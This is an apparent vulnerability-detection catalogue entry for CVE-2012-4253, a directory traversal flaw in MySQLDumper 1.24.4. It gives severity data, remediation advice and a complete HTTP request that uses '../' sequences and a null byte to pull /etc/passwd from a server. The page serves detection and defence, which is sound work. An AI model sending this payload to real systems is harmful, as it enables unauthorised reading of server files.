🔙 목록으로 돌아가기

CVE-2012-4253: MySQLDumper 1.24.4 - Directory Traversal

TitleMySQLDumper 1.24.4 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability.
CVSS Score4.3
EPSS Score0.62719
CVE IDCVE-2012-4253
CWE IDCWE-22
Tags cve2012 cve packetstorm lfi edb mysqldumper xss vuln

🔍 Vulnerability Description

Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.

🌐 HTTP Request

GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 X11; Ubuntu; Linux x86_64; rv:126.0 Gecko/20100101 Firefox/126.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-4253.yaml

🦈 Packet Capture: ⬇️ Download cve-2012-4253.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A